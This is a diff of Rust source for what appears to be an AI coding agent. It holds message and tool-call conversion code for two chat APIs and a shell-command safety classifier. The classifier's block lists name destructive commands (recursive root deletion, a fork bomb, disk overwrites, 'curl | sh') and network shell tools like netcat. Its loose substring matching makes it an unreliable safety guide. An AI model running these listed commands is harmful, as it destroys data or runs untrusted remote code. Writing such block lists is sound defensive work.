||||
.collect::<Vec<_>>()
|
||||
.join("\n\n---\n\n");
|
||||
if joined.trim().is_empty() {
|
||||
None
|
||||
} else {
|
||||
Some(joined)
|
||||
}
|
||||
}
|
||||
None => None,
|
||||
}
|
||||
}
|
||||
|
||||
fn build_responses_input(messages: &[Message]) -> Vec<Value> {
|
||||
let mut items = Vec::new();
|
||||
|
||||
for message in messages {
|
||||
let role = message.role.as_str();
|
||||
let text_type = if role == "user" {
|
||||
"input_text"
|
||||
} else {
|
||||
"output_text"
|
||||
};
|
||||
|
||||
for block in &message.content {
|
||||
match block {
|
||||
ContentBlock::Text { text, .. } => {
|
||||
items.push(json!({
|
||||
"type": "message",
|
||||
"role": role,
|
||||
"content": [{
|
||||
"type": text_type,
|
||||
"text": text,
|
||||
}]
|
||||
}));
|
||||
}
|
||||
ContentBlock::ToolUse { id, name, input } => {
|
||||
let args = serde_json::to_string(input).unwrap_or_else(|_| input.to_string());
|
||||
items.push(json!({
|
||||
"type": "function_call",
|
||||
"call_id": id,
|
||||
"name": name,
|
||||
"arguments": args,
|
||||
}));
|
||||
}
|
||||
ContentBlock::ToolResult {
|
||||
tool_use_id,
|
||||
content,
|
||||
} => {
|
||||
items.push(json!({
|
||||
"type": "function_call_output",
|
||||
"call_id": tool_use_id,
|
||||
"output": content,
|
||||
}));
|
||||
}
|
||||
ContentBlock::Thinking { .. } => {}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
items
|
||||
}
|
||||
|
||||
fn tool_to_responses(tool: &Tool) -> Value {
|
||||
json!({
|
||||
"type": "function",
|
||||
"name": tool.name,
|
||||
"description": tool.description,
|
||||
"parameters": tool.input_schema,
|
||||
})
|
||||
}
|
||||
|
||||
fn parse_responses_message(payload: &Value) -> Result<MessageResponse> {
|
||||
let id = payload
|
||||
.get("id")
|
||||
.and_then(Value::as_str)
|
||||
.unwrap_or("response")
|
||||
.to_string();
|
||||
let model = payload
|
||||
.get("model")
|
||||
.and_then(Value::as_str)
|
||||
.unwrap_or("unknown")
|
||||
.to_string();
|
||||
|
||||
let usage = parse_usage(payload.get("usage"));
|
||||
let mut content = Vec::new();
|
||||
|
||||
if let Some(output) = payload.get("output").and_then(Value::as_array) {
|
||||
for item in output {
|
||||
let item_type = item.get("type").and_then(Value::as_str).unwrap_or("");
|
||||
match item_type {
|
||||
"message" => {
|
||||
if let Some(role) = item.get("role").and_then(Value::as_str)
|
||||
&& role != "assistant"
|
||||
{
|
||||
continue;
|
||||
}
|
||||
if let Some(content_items) = item.get("content").and_then(Value::as_array) {
|
||||
for content_item in content_items {
|
||||
let content_type = content_item
|
||||
.get("type")
|
||||
.and_then(Value::as_str)
|
||||
.unwrap_or("output_text");
|
||||
if content_type != "output_text" && content_type != "text" {
|
||||
continue;
|
||||
}
|
||||
if let Some(text) = content_item.get("text").and_then(Value::as_str) {
|
||||
if !text.trim().is_empty() {
|
||||
content.push(ContentBlock::Text {
|
||||
text: text.to_string(),
|
||||
cache_control: None,
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
"function_call" => {
|
||||
let call_id = item
|
||||
.get("call_id")
|
||||
.or_else(|| item.get("id"))
|
||||
.and_then(Value::as_str)
|
||||
.unwrap_or("tool_call")
|
||||
.to_string();
|
||||
let name = item
|
||||
.get("name")
|
||||
.and_then(Value::as_str)
|
||||
.unwrap_or("tool")
|
||||
.to_string();
|
||||
let input = match item.get("arguments") {
|
||||
Some(Value::String(raw)) => {
|
||||
serde_json::from_str(raw).unwrap_or_else(|_| Value::String(raw.clone()))
|
||||
}
|
||||
Some(other) => other.clone(),
|
||||
None => Value::Null,
|
||||
};
|
||||
content.push(ContentBlock::ToolUse {
|
||||
id: call_id,
|
||||
name,
|
||||
input,
|
||||
});
|
||||
}
|
||||
"reasoning" => {
|
||||
if let Some(summary) = item.get("summary").and_then(Value::as_array) {
|
||||
let summary_text = summary
|
||||
.iter()
|
||||
.filter_map(|s| s.get("text").and_then(Value::as_str))
|
||||
.collect::<Vec<_>>()
|
||||
.join("\n");
|
||||
if !summary_text.trim().is_empty() {
|
||||
content.push(ContentBlock::Thinking {
|
||||
thinking: summary_text,
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if content.is_empty() {
|
||||
if let Some(text) = payload.get("output_text").and_then(Value::as_str) {
|
||||
if !text.trim().is_empty() {
|
||||
content.push(ContentBlock::Text {
|
||||
text: text.to_string(),
|
||||
cache_control: None,
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(MessageResponse {
|
||||
id,
|
||||
r#type: "message".to_string(),
|
||||
role: "assistant".to_string(),
|
||||
content,
|
||||
model,
|
||||
stop_reason: None,
|
||||
stop_sequence: None,
|
||||
usage,
|
||||
})
|
||||
}
|
||||
|
||||
// === Chat Completions Helpers ===
|
||||
|
||||
fn build_chat_messages(
|
||||
system: Option<&SystemPrompt>,
|
||||
messages: &[Message],
|
||||
model: &str,
|
||||
) -> Vec<Value> {
|
||||
let mut out = Vec::new();
|
||||
let include_reasoning = requires_reasoning_content(model);
|
||||
|
||||
if let Some(instructions) = system_to_instructions(system.cloned()) {
|
||||
if !instructions.trim().is_empty() {
|
||||
out.push(json!({
|
||||
"role": "system",
|
||||
"content": instructions,
|
||||
}));
|
||||
}
|
||||
}
|
||||
|
||||
for message in messages {
|
||||
let role = message.role.as_str();
|
||||
let mut text_parts = Vec::new();
|
||||
let mut thinking_parts = Vec::new();
|
||||
let mut tool_calls = Vec::new();
|
||||
let mut tool_results = Vec::new();
|
||||
|
||||
for block in &message.content {
|
||||
match block {
|
||||
ContentBlock::Text { text, .. } => text_parts.push(text.clone()),
|
||||
ContentBlock::Thinking { thinking } => thinking_parts.push(thinking.clone()),
|
||||
ContentBlock::ToolUse { id, name, input } => {
|
||||
let args = serde_json::to_string(input).unwrap_or_else(|_| input.to_string());
|
||||
tool_calls.push(json!({
|
||||
"id": id,
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": name,
|
||||
"arguments": args,
|
||||
}
|
||||
}));
|
||||
}
|
||||
ContentBlock::ToolResult {
|
||||
tool_use_id,
|
||||
content,
|
||||
} => {
|
||||
tool_results.push(json!({
|
||||
"role": "tool",
|
||||
"tool_call_id": tool_use_id,
|
||||
"content": content,
|
||||
}));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if role == "assistant" {
|
||||
let content = text_parts.join("\n");
|
||||
let mut msg = json!({
|
||||
"role": "assistant",
|
||||
"content": if content.is_empty() { Value::Null } else { json!(content) },
|
||||
});
|
||||
if include_reasoning {
|
||||
msg["reasoning_content"] = json!(thinking_parts.join("\n"));
|
||||
}
|
||||
if !tool_calls.is_empty() {
|
||||
msg["tool_calls"] = json!(tool_calls);
|
||||
}
|
||||
out.push(msg);
|
||||
} else if role == "user" {
|
||||
let content = text_parts.join("\n");
|
||||
if !content.trim().is_empty() {
|
||||
out.push(json!({
|
||||
"role": "user",
|
||||
"content": content,
|
||||
}));
|
||||
}
|
||||
}
|
||||
|
||||
if !tool_results.is_empty() {
|
||||
out.extend(tool_results);
|
||||
}
|
||||
}
|
||||
|
||||
out
|
||||
}
|
||||
|
||||
fn tool_to_chat(tool: &Tool) -> Value {
|
||||
json!({
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": tool.name,
|
||||
"description": tool.description,
|
||||
"parameters": tool.input_schema,
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
fn map_tool_choice_for_chat(choice: &Value) -> Option<Value> {
|
||||
if let Some(choice_str) = choice.as_str() {
|
||||
return Some(json!(choice_str));
|
||||
}
|
||||
let Some(choice_type) = choice.get("type").and_then(Value::as_str) else {
|
||||
return Some(choice.clone());
|
||||
};
|
||||
|
||||
match choice_type {
|
||||
"auto" | "none" => Some(json!(choice_type)),
|
||||
"any" => Some(json!("auto")),
|
||||
"tool" => choice.get("name").and_then(Value::as_str).map(|name| {
|
||||
json!({
|
||||
"type": "function",
|
||||
"function": { "name": name }
|
||||
})
|
||||
}),
|
||||
_ => Some(choice.clone()),
|
||||
}
|
||||
}
|
||||
|
||||
fn requires_reasoning_content(model: &str) -> bool {
|
||||
let lower = model.to_lowercase();
|
||||
lower.contains("deepseek-reasoner")
|
||||
|| lower.contains("deepseek-r1")
|
||||
|| lower.contains("reasoner")
|
||||
}
|
||||
|
||||
fn parse_chat_message(payload: &Value) -> Result<MessageResponse> {
|
||||
let id = payload
|
||||
.get("id")
|
||||
.and_then(Value::as_str)
|
||||
.unwrap_or("chatcmpl")
|
||||
.to_string();
|
||||
let model = payload
|
||||
.get("model")
|
||||
.and_then(Value::as_str)
|
||||
.unwrap_or("unknown")
|
||||
.to_string();
|
||||
|
||||
let choices = payload
|
||||
.get("choices")
|
||||
.and_then(Value::as_array)
|
||||
.context("Chat API response missing choices")?;
|
||||
let choice = choices
|
||||
.get(0)
|
||||
.context("Chat API response missing first choice")?;
|
||||
let message = choice
|
||||
.get("message")
|
||||
.context("Chat API response missing message")?;
|
||||
|
||||
let mut content_blocks = Vec::new();
|
||||
if let Some(reasoning) = message.get("reasoning_content").and_then(Value::as_str) {
|
||||
if !reasoning.trim().is_empty() {
|
||||
content_blocks.push(ContentBlock::Thinking {
|
||||
thinking: reasoning.to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
if let Some(text) = message.get("content").and_then(Value::as_str) {
|
||||
if !text.trim().is_empty() {
|
||||
content_blocks.push(ContentBlock::Text {
|
||||
text: text.to_string(),
|
||||
cache_control: None,
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
if let Some(tool_calls) = message.get("tool_calls").and_then(Value::as_array) {
|
||||
for call in tool_calls {
|
||||
let id = call
|
||||
.get("id")
|
||||
.and_then(Value::as_str)
|
||||
.unwrap_or("tool_call")
|
||||
.to_string();
|
||||
let function = call.get("function");
|
||||
let name = function
|
||||
.and_then(|f| f.get("name"))
|
||||
.and_then(Value::as_str)
|
||||
.unwrap_or("tool")
|
||||
.to_string();
|
||||
let arguments = function
|
||||
.and_then(|f| f.get("arguments"))
|
||||
.and_then(Value::as_str)
|
||||
.map(|raw| serde_json::from_str(raw).unwrap_or(Value::String(raw.to_string())))
|
||||
.unwrap_or(Value::Null);
|
||||
|
||||
content_blocks.push(ContentBlock::ToolUse {
|
||||
id,
|
||||
name,
|
||||
input: arguments,
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
let usage = parse_usage(payload.get("usage"));
|
||||
|
||||
Ok(MessageResponse {
|
||||
id,
|
||||
r#type: "message".to_string(),
|
||||
role: "assistant".to_string(),
|
||||
content: content_blocks,
|
||||
model,
|
||||
stop_reason: choice
|
||||
.get("finish_reason")
|
||||
.and_then(Value::as_str)
|
||||
.map(str::to_string),
|
||||
stop_sequence: None,
|
||||
usage,
|
||||
})
|
||||
}
|
||||
|
||||
fn parse_usage(usage: Option<&Value>) -> Usage {
|
||||
let input_tokens = usage
|
||||
.and_then(|u| u.get("input_tokens").or_else(|| u.get("prompt_tokens")))
|
||||
.and_then(Value::as_u64)
|
||||
.unwrap_or(0);
|
||||
let output_tokens = usage
|
||||
.and_then(|u| {
|
||||
u.get("output_tokens")
|
||||
.or_else(|| u.get("completion_tokens"))
|
||||
})
|
||||
.and_then(Value::as_u64)
|
||||
.unwrap_or(0);
|
||||
|
||||
Usage {
|
||||
input_tokens: input_tokens as u32,
|
||||
output_tokens: output_tokens as u32,
|
||||
}
|
||||
}
|
||||
|
||||
// === Streaming Helpers ===
|
||||
|
||||
fn build_stream_events(response: &MessageResponse) -> Vec<StreamEvent> {
|
||||
let mut events = Vec::new();
|
||||
let mut index = 0u32;
|
||||
|
||||
events.push(StreamEvent::MessageStart {
|
||||
message: response.clone(),
|
||||
});
|
||||
|
||||
for block in &response.content {
|
||||
match block {
|
||||
ContentBlock::Text { text, .. } => {
|
||||
events.push(StreamEvent::ContentBlockStart {
|
||||
index,
|
||||
content_block: ContentBlockStart::Text {
|
||||
text: String::new(),
|
||||
},
|
||||
});
|
||||
if !text.is_empty() {
|
||||
events.push(StreamEvent::ContentBlockDelta {
|
||||
index,
|
||||
delta: Delta::TextDelta { text: text.clone() },
|
||||
});
|
||||
}
|
||||
events.push(StreamEvent::ContentBlockStop { index });
|
||||
}
|
||||
ContentBlock::Thinking { thinking } => {
|
||||
events.push(StreamEvent::ContentBlockStart {
|
||||
index,
|
||||
content_block: ContentBlockStart::Thinking {
|
||||
thinking: String::new(),
|
||||
},
|
||||
});
|
||||
if !thinking.is_empty() {
|
||||
events.push(StreamEvent::ContentBlockDelta {
|
||||
index,
|
||||
delta: Delta::ThinkingDelta {
|
||||
thinking: thinking.clone(),
|
||||
},
|
||||
});
|
||||
}
|
||||
events.push(StreamEvent::ContentBlockStop { index });
|
||||
}
|
||||
ContentBlock::ToolUse { id, name, input } => {
|
||||
events.push(StreamEvent::ContentBlockStart {
|
||||
index,
|
||||
content_block: ContentBlockStart::ToolUse {
|
||||
id: id.clone(),
|
||||
name: name.clone(),
|
||||
input: input.clone(),
|
||||
},
|
||||
});
|
||||
events.push(StreamEvent::ContentBlockStop { index });
|
||||
}
|
||||
ContentBlock::ToolResult { .. } => {}
|
||||
}
|
||||
index = index.saturating_add(1);
|
||||
}
|
||||
|
||||
events.push(StreamEvent::MessageDelta {
|
||||
delta: MessageDelta {
|
||||
stop_reason: response.stop_reason.clone(),
|
||||
stop_sequence: response.stop_sequence.clone(),
|
||||
},
|
||||
usage: Some(response.usage.clone()),
|
||||
});
|
||||
events.push(StreamEvent::MessageStop);
|
||||
|
||||
events
|
||||
}
|
||||
|
||||
// === Retry Helpers ===
|
||||
|
||||
async fn send_with_retry<F>(policy: &RetryPolicy, mut build: F) -> Result<reqwest::Response>
|
||||
where
|
||||
F: FnMut() -> reqwest::RequestBuilder,
|
||||
{
|
||||
let mut attempt: u32 = 0;
|
||||
|
||||
loop {
|
||||
let result = build().send().await;
|
||||
|
||||
match result {
|
||||
Ok(response) => {
|
||||
let status = response.status();
|
||||
|
||||
// Return successful responses immediately
|
||||
if status.is_success() {
|
||||
return Ok(response);
|
||||
}
|
||||
|
||||
// Return non-retryable errors to let caller handle (e.g., 404 for fallback)
|
||||
let retryable = status.as_u16() == 429 || status.is_server_error();
|
||||
if !retryable {
|
||||
return Ok(response);
|
||||
}
|
||||
|
||||
// Retry if policy allows and we haven't exceeded max retries
|
||||
if !policy.enabled || attempt >= policy.max_retries {
|
||||
return Ok(response);
|
||||
}
|
||||
|
||||
logging::warn(format!(
|
||||
"Retryable HTTP {} (attempt {} of {})",
|
||||
status.as_u16(),
|
||||
attempt + 1,
|
||||
policy.max_retries + 1
|
||||
));
|
||||
}
|
||||
Err(err) => {
|
||||
if !policy.enabled || attempt >= policy.max_retries {
|
||||
return Err(err.into());
|
||||
}
|
||||
logging::warn(format!(
|
||||
"Request error: {} (attempt {} of {})",
|
||||
err,
|
||||
attempt + 1,
|
||||
policy.max_retries + 1
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
let delay = policy.delay_for_attempt(attempt);
|
||||
attempt += 1;
|
||||
logging::info(format!("Retrying after {:.2}s", delay.as_secs_f64()));
|
||||
tokio::time::sleep(delay).await;
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn chat_messages_include_reasoning_content_for_reasoner() {
|
||||
let message = Message {
|
||||
role: "assistant".to_string(),
|
||||
content: vec![
|
||||
ContentBlock::Thinking {
|
||||
thinking: "plan".to_string(),
|
||||
},
|
||||
ContentBlock::Text {
|
||||
text: "done".to_string(),
|
||||
cache_control: None,
|
||||
},
|
||||
],
|
||||
};
|
||||
let out = build_chat_messages(None, &[message], "deepseek-reasoner");
|
||||
let assistant = out
|
||||
.iter()
|
||||
.find(|value| value.get("role").and_then(Value::as_str) == Some("assistant"))
|
||||
.expect("assistant message");
|
||||
assert_eq!(
|
||||
assistant.get("reasoning_content").and_then(Value::as_str),
|
||||
Some("plan")
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn chat_messages_skip_reasoning_content_for_chat_model() {
|
||||
let message = Message {
|
||||
role: "assistant".to_string(),
|
||||
content: vec![ContentBlock::Thinking {
|
||||
thinking: "plan".to_string(),
|
||||
}],
|
||||
};
|
||||
let out = build_chat_messages(None, &[message], "deepseek-chat");
|
||||
let assistant = out
|
||||
.iter()
|
||||
.find(|value| value.get("role").and_then(Value::as_str) == Some("assistant"))
|
||||
.expect("assistant message");
|
||||
assert!(assistant.get("reasoning_content").is_none());
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,618 @@
|
||||
//! Command safety analysis for shell execution
|
||||
//!
|
||||
//! This module provides pre-execution analysis of shell commands to detect
|
||||
//! potentially dangerous patterns and prevent accidental damage.
|
||||
|
||||
#![allow(dead_code)] // Public API - utility functions may not be used yet
|
||||
|
||||
/// Safety classification of a command
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
|
||||
pub enum SafetyLevel {
|
||||
/// Command is known to be safe (read-only operations)
|
||||
Safe,
|
||||
/// Command is safe within the workspace but may modify files
|
||||
WorkspaceSafe,
|
||||
/// Command may have system-wide effects and requires approval
|
||||
RequiresApproval,
|
||||
/// Command is potentially dangerous and should be blocked
|
||||
Dangerous,
|
||||
}
|
||||
|
||||
/// Result of analyzing a command
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct SafetyAnalysis {
|
||||
pub level: SafetyLevel,
|
||||
pub command: String,
|
||||
pub reasons: Vec<String>,
|
||||
pub suggestions: Vec<String>,
|
||||
}
|
||||
|
||||
impl SafetyAnalysis {
|
||||
pub fn safe(command: &str) -> Self {
|
||||
Self {
|
||||
level: SafetyLevel::Safe,
|
||||
command: command.to_string(),
|
||||
reasons: vec!["Command is read-only".to_string()],
|
||||
suggestions: vec![],
|
||||
}
|
||||
}
|
||||
|
||||
pub fn workspace_safe(command: &str, reason: &str) -> Self {
|
||||
Self {
|
||||
level: SafetyLevel::WorkspaceSafe,
|
||||
command: command.to_string(),
|
||||
reasons: vec![reason.to_string()],
|
||||
suggestions: vec![],
|
||||
}
|
||||
}
|
||||
|
||||
pub fn requires_approval(command: &str, reasons: Vec<String>) -> Self {
|
||||
Self {
|
||||
level: SafetyLevel::RequiresApproval,
|
||||
command: command.to_string(),
|
||||
reasons,
|
||||
suggestions: vec![],
|
||||
}
|
||||
}
|
||||
|
||||
pub fn dangerous(command: &str, reasons: Vec<String>, suggestions: Vec<String>) -> Self {
|
||||
Self {
|
||||
level: SafetyLevel::Dangerous,
|
||||
command: command.to_string(),
|
||||
reasons,
|
||||
suggestions,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Known safe commands that only read data
|
||||
const SAFE_COMMANDS: &[&str] = &[
|
||||
"ls",
|
||||
"dir",
|
||||
"pwd",
|
||||
"cd",
|
||||
"cat",
|
||||
"head",
|
||||
"tail",
|
||||
"less",
|
||||
"more",
|
||||
"grep",
|
||||
"rg",
|
||||
"ag",
|
||||
"find",
|
||||
"fd",
|
||||
"which",
|
||||
"whereis",
|
||||
"type",
|
||||
"echo",
|
||||
"printf",
|
||||
"date",
|
||||
"cal",
|
||||
"uptime",
|
||||
"whoami",
|
||||
"id",
|
||||
"hostname",
|
||||
"uname",
|
||||
"env",
|
||||
"printenv",
|
||||
"set",
|
||||
"ps",
|
||||
"top",
|
||||
"htop",
|
||||
"df",
|
||||
"du",
|
||||
"free",
|
||||
"vmstat",
|
||||
"wc",
|
||||
"sort",
|
||||
"uniq",
|
||||
"cut",
|
||||
"tr",
|
||||
"awk",
|
||||
"sed",
|
||||
"diff",
|
||||
"file",
|
||||
"stat",
|
||||
"md5",
|
||||
"sha1sum",
|
||||
"sha256sum",
|
||||
"git status",
|
||||
"git log",
|
||||
"git diff",
|
||||
"git show",
|
||||
"git branch",
|
||||
"git remote",
|
||||
"git tag",
|
||||
"git stash list",
|
||||
"npm list",
|
||||
"npm ls",
|
||||
"npm outdated",
|
||||
"npm view",
|
||||
"cargo check",
|
||||
"cargo test",
|
||||
"cargo build",
|
||||
"cargo doc",
|
||||
"python --version",
|
||||
"node --version",
|
||||
"rustc --version",
|
||||
"man",
|
||||
"help",
|
||||
"info",
|
||||
];
|
||||
|
||||
/// Commands that are safe within workspace but modify files
|
||||
const WORKSPACE_SAFE_COMMANDS: &[&str] = &[
|
||||
"mkdir",
|
||||
"touch",
|
||||
"cp",
|
||||
"mv",
|
||||
"git add",
|
||||
"git commit",
|
||||
"git checkout",
|
||||
"git switch",
|
||||
"git restore",
|
||||
"git merge",
|
||||
"git rebase",
|
||||
"git cherry-pick",
|
||||
"git reset --soft",
|
||||
"npm install",
|
||||
"npm ci",
|
||||
"npm update",
|
||||
"cargo build",
|
||||
"cargo run",
|
||||
"cargo test",
|
||||
"cargo fmt",
|
||||
"pip install",
|
||||
"pip uninstall",
|
||||
"make",
|
||||
"cmake",
|
||||
"ninja",
|
||||
];
|
||||
|
||||
/// Dangerous command patterns that should be blocked or warned
|
||||
const DANGEROUS_PATTERNS: &[(&str, &str)] = &[
|
||||
("rm -rf /", "Attempts to recursively delete root filesystem"),
|
||||
(
|
||||
"rm -rf /*",
|
||||
"Attempts to recursively delete all root directories",
|
||||
),
|
||||
("rm -rf ~", "Attempts to recursively delete home directory"),
|
||||
(
|
||||
"rm -rf $HOME",
|
||||
"Attempts to recursively delete home directory",
|
||||
),
|
||||
(":(){ :|:& };:", "Fork bomb - will crash the system"),
|
||||
("dd if=/dev/zero of=/dev/", "Will overwrite disk device"),
|
||||
("mkfs.", "Will format a filesystem"),
|
||||
("> /dev/sd", "Will overwrite disk device"),
|
||||
("chmod -R 777 /", "Dangerous permission change on root"),
|
||||
(
|
||||
"chown -R",
|
||||
"Recursive ownership change - potentially dangerous",
|
||||
),
|
||||
("curl | sh", "Piping remote script directly to shell"),
|
||||
("curl | bash", "Piping remote script directly to shell"),
|
||||
("wget -O - | sh", "Piping remote script directly to shell"),
|
||||
("sudo rm -rf", "Privileged recursive deletion"),
|
||||
("sudo dd", "Privileged disk operation"),
|
||||
("shutdown", "System shutdown command"),
|
||||
("reboot", "System reboot command"),
|
||||
("halt", "System halt command"),
|
||||
("poweroff", "System poweroff command"),
|
||||
("init 0", "System shutdown via init"),
|
||||
("init 6", "System reboot via init"),
|
||||
("kill -9 1", "Killing init process"),
|
||||
("killall", "Killing processes by name"),
|
||||
("pkill", "Killing processes by pattern"),
|
||||
(
|
||||
"docker rm -f $(docker ps -aq)",
|
||||
"Removing all Docker containers",
|
||||
),
|
||||
("docker system prune -a", "Removing all Docker data"),
|
||||
(":(){:|:&};:", "Fork bomb variant"),
|
||||
("mv /* ", "Moving root filesystem contents"),
|
||||
("cat /dev/urandom > /dev/", "Writing random data to device"),
|
||||
];
|
||||
|
||||
/// Commands that require elevated privileges
|
||||
const PRIVILEGED_PATTERNS: &[&str] = &["sudo", "su ", "doas", "pkexec", "gksudo", "kdesudo"];
|
||||
|
||||
/// Network-related commands
|
||||
const NETWORK_COMMANDS: &[&str] = &[
|
||||
"curl",
|
||||
"wget",
|
||||
"fetch",
|
||||
"nc",
|
||||
"netcat",
|
||||
"ncat",
|
||||
"ssh",
|
||||
"scp",
|
||||
"sftp",
|
||||
"rsync",
|
||||
"ftp",
|
||||
"ping",
|
||||
"traceroute",
|
||||
"nslookup",
|
||||
"dig",
|
||||
"host",
|
||||
"nmap",
|
||||
"masscan",
|
||||
"tcpdump",
|
||||
"wireshark",
|
||||
];
|
||||
|
||||
/// Analyze a shell command for safety
|
||||
pub fn analyze_command(command: &str) -> SafetyAnalysis {
|
||||
let command_lower = command.to_lowercase();
|
||||
let command_trimmed = command.trim();
|
||||
|
||||
if command.contains('\n') || command.contains('\r') {
|
||||
return SafetyAnalysis::dangerous(
|
||||
command,
|
||||
vec!["Command contains multiple lines".to_string()],
|
||||
vec!["Run one command at a time".to_string()],
|
||||
);
|
||||
}
|
||||
|
||||
if command.contains("&&") || command.contains("||") || command.contains(';') {
|
||||
return SafetyAnalysis::dangerous(
|
||||
command,
|
||||
vec!["Command chaining detected".to_string()],
|
||||
vec!["Run commands separately to reduce risk".to_string()],
|
||||
);
|
||||
}
|
||||
|
||||
if command.contains("`") || command.contains("$(") {
|
||||
return SafetyAnalysis::dangerous(
|
||||
command,
|
||||
vec!["Command substitution detected".to_string()],
|
||||
vec!["Avoid shell substitutions in exec_shell".to_string()],
|
||||
);
|
||||
}
|
||||
|
||||
// Check for dangerous patterns first
|
||||
for (pattern, reason) in DANGEROUS_PATTERNS {
|
||||
if command_lower.contains(&pattern.to_lowercase()) {
|
||||
return SafetyAnalysis::dangerous(
|
||||
command,
|
||||
vec![(*reason).to_string()],
|
||||
vec!["Review the command carefully before execution".to_string()],
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
// Check for privileged commands
|
||||
for pattern in PRIVILEGED_PATTERNS {
|
||||
if command_trimmed.starts_with(pattern) || command_lower.contains(&format!(" {pattern} ")) {
|
||||
return SafetyAnalysis::requires_approval(
|
||||
command,
|
||||
vec![format!(
|
||||
"Command uses privileged execution ({})",
|
||||
pattern.trim()
|
||||
)],
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
// Check for pipe to shell (remote code execution risk)
|
||||
if (command_lower.contains("curl") || command_lower.contains("wget"))
|
||||
&& (command_lower.contains("| sh")
|
||||
|| command_lower.contains("| bash")
|
||||
|| command_lower.contains("| zsh"))
|
||||
{
|
||||
return SafetyAnalysis::dangerous(
|
||||
command,
|
||||
vec!["Piping remote content directly to shell is dangerous".to_string()],
|
||||
vec!["Download the script first and review it before execution".to_string()],
|
||||
);
|
||||
}
|
||||
|
||||
// Check if it's a known safe command
|
||||
let first_word = command_trimmed.split_whitespace().next().unwrap_or("");
|
||||
if is_safe_command(command_trimmed) {
|
||||
return SafetyAnalysis::safe(command);
|
||||
}
|
||||
|
||||
// Check for workspace-safe commands
|
||||
if is_workspace_safe_command(command_trimmed) {
|
||||
return SafetyAnalysis::workspace_safe(command, "Command modifies files within workspace");
|
||||
}
|
||||
|
||||
// Check for network commands
|
||||
if NETWORK_COMMANDS.contains(&first_word) {
|
||||
return SafetyAnalysis::requires_approval(
|
||||
command,
|
||||
vec!["Command may make network requests".to_string()],
|
||||
);
|
||||
}
|
||||
|
||||
// Check for rm with -r or -f flags
|
||||
if first_word == "rm" && (command_lower.contains("-r") || command_lower.contains("-f")) {
|
||||
let mut reasons = vec!["Recursive or forced deletion".to_string()];
|
||||
let mut suggestions = vec![];
|
||||
|
||||
// Check if it's deleting outside workspace markers
|
||||
if command_lower.contains("..")
|
||||
|| command_lower.contains("~/")
|
||||
|| command_lower.contains("$HOME")
|
||||
{
|
||||
reasons.push("May delete files outside workspace".to_string());
|
||||
suggestions.push("Use relative paths within the workspace".to_string());
|
||||
return SafetyAnalysis::dangerous(command, reasons, suggestions);
|
||||
}
|
||||
|
||||
return SafetyAnalysis::requires_approval(command, reasons);
|
||||
}
|
||||
|
||||
// Check for git push/force operations
|
||||
if command_lower.contains("git push") {
|
||||
if command_lower.contains("--force") || command_lower.contains("-f") {
|
||||
return SafetyAnalysis::requires_approval(
|
||||
command,
|
||||
vec!["Force push can overwrite remote history".to_string()],
|
||||
);
|
||||
}
|
||||
return SafetyAnalysis::requires_approval(
|
||||
command,
|
||||
vec!["Push will modify remote repository".to_string()],
|
||||
);
|
||||
}
|
||||
|
||||
// Default: requires approval for unknown commands
|
||||
SafetyAnalysis::requires_approval(
|
||||
command,
|
||||
vec!["Unknown command - review before execution".to_string()],
|
||||
)
|
||||
}
|
||||
|
||||
/// Check if a command is known to be safe
|
||||
fn is_safe_command(command: &str) -> bool {
|
||||
let command_lower = command.to_lowercase();
|
||||
|
||||
for safe_cmd in SAFE_COMMANDS {
|
||||
if command_lower.starts_with(safe_cmd) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
|
||||
false
|
||||
}
|
||||
|
||||
/// Check if a command is safe within the workspace
|
||||
fn is_workspace_safe_command(command: &str) -> bool {
|
||||
let command_lower = command.to_lowercase();
|
||||
|
||||
for ws_cmd in WORKSPACE_SAFE_COMMANDS {
|
||||
if command_lower.starts_with(ws_cmd) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
|
||||
false
|
||||
}
|
||||
|
||||
/// Check if a path escapes the workspace
|
||||
pub fn path_escapes_workspace(path: &str, workspace: &str) -> bool {
|
||||
let path_lower = path.to_lowercase();
|
||||
|
||||
// Check for obvious escape patterns
|
||||
if path_lower.starts_with('/') && !path_lower.starts_with(workspace) {
|
||||
return true;
|
||||
}
|
||||
|
||||
if path_lower.starts_with("~/") || path_lower.starts_with("$home") {
|
||||
return true;
|
||||
}
|
||||
|
||||
// Check for ../ traversal
|
||||
if path.contains("..") {
|
||||
// Count the ../ sequences and check if they escape
|
||||
let workspace_depth = workspace.matches('/').count();
|
||||
let escape_count = path.matches("..").count();
|
||||
if escape_count > workspace_depth {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
|
||||
false
|
||||
}
|
||||
|
||||
/// Parse a command and extract the primary command name
|
||||
pub fn extract_primary_command(command: &str) -> Option<&str> {
|
||||
let trimmed = command.trim();
|
||||
|
||||
// Handle env vars at start
|
||||
if trimmed.starts_with("env ") || trimmed.starts_with("ENV=") {
|
||||
// Skip env setup - find first token that's not an env var
|
||||
trimmed
|
||||
.split_whitespace()
|
||||
.find(|s| !s.contains('=') && *s != "env")
|
||||
} else {
|
||||
trimmed.split_whitespace().next()
|
||||
}
|
||||
}
|
||||
|
||||
/// Categorize commands into groups
|
||||
